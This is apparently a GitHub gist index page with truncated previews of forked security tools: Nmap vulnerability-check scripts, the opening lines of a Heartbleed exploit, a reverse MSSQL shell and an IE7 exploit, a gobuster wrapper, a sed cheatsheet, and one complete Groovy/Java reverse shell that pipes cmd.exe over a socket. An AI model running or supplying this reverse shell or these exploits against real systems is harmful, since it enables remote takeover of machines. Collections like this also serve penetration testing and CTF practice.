Yuhisern Navaratnam yuhisern7

  • Malaysia
@yuhisern7
yuhisern7 / oracle-tns-poison.nse
Created Sep 6, 2019 — forked from JukArkadiy/oracle-tns-poison.nse
Nmap script to test Oracle DB for "TNS poison vulnerability"
View oracle-tns-poison.nse
local bin = require "bin"
local io = require "io"
local nmap = require "nmap"
local shortport = require "shortport"
local stdnse = require "stdnse"
local table = require "table"
description = [[
Simple module to test Oracle DB server for TNS Poison vulnerability.
Module sends to server a packet with command to register new TNS Listener and check response
@yuhisern7
yuhisern7 / http-vuln-cve2017-9805.nse
Created Aug 30, 2019 — forked from r00tpgp/http-vuln-cve2017-9805.nse
Nmap NSE Script Detects whether the specified URL is vulnerable to the Apache Struts REST Plugin XStream Remote Code Execution Vulnerability (CVE-2017-9805)
View http-vuln-cve2017-9805.nse
description = [[
Detects whether the specified URL is vulnerable to the Apache Struts REST Plugin XStream
Remote Code Execution Vulnerability (CVE-2017-9805).
]]
local http = require "http"
local shortport = require "shortport"
local vulns = require "vulns"
local stdnse = require "stdnse"
local string = require "string"
@yuhisern7
yuhisern7 / revsh.groovy
Created Aug 29, 2019 — forked from frohoff/revsh.groovy
Pure Groovy/Java Reverse Shell
View revsh.groovy
String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
@yuhisern7
yuhisern7 / mandros.py
Created Jul 22, 2019 — forked from xassiz/mandros.py
Reverse MSSQL shell
View mandros.py
import sys
import requests
import threading
import HTMLParser
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
'''
Description: Reverse MSSQL shell through xp_cmdshell + certutil for exfiltration
Author: @xassiz
'''
@yuhisern7
yuhisern7 / heartbleed.py
Created Jul 5, 2019 — forked from eelsivart/heartbleed.py
Heartbleed (CVE-2014-0160) Test & Exploit Python Script
View heartbleed.py
#!/usr/bin/python
# Modified by Travis Lee
# Last Updated: 4/21/14
# Version 1.16
#
# -changed output to display text only instead of hexdump and made it easier to read
# -added option to specify number of times to connect to server (to get more data)
# -added option to send STARTTLS command for use with SMTP/POP/IMAP/FTP/etc...
# -added option to specify an input file of multiple hosts, line delimited, with or without a port specified (host:port)
View sed cheatsheet
FILE SPACING:
# double space a file
sed G
# double space a file which already has blank lines in it. Output file
# should contain no more than one blank line between lines of text.
sed '/^$/d;G'
@yuhisern7
yuhisern7 / supergobuster.sh
Created Sep 9, 2018 — forked from lokori/supergobuster.sh
gobuster enumerator for hack-the-box machines. This generates huge amount of useless requests..
View supergobuster.sh
#!/bin/bash
set -eu
URL=$1
echo "super go bustering for super brute: $URL"
# Quote the URL so characters such as ? or * are not expanded by the shell
gobuster -u "$URL" -l -s 200,204,301,302,307,403 -w /root/tools/SecLists/Discovery/Web_Content/tomcat.txt
gobuster -u "$URL" -l -s 200,204,301,302,307,403 -w /root/tools/SecLists/Discovery/Web_Content/nginx.txt
gobuster -u "$URL" -l -s 200,204,301,302,307,403 -w /root/tools/SecLists/Discovery/Web_Content/apache.txt
@yuhisern7
yuhisern7 / exploit.html
Created Aug 27, 2018 — forked from 0x09AL/exploit.html
Internet Explorer 7 RSP Exploit for blogpost
View exploit.html
<!DOCTYPE html>
<html>
<head>
<title> Exploit for IE 7 </title>
<object id="VULNERABLE" classid='clsid:3C88113F-8CEC-48DC-A0E5-983EF9458687'></object>
</head>
<body>
<script type="text/javascript">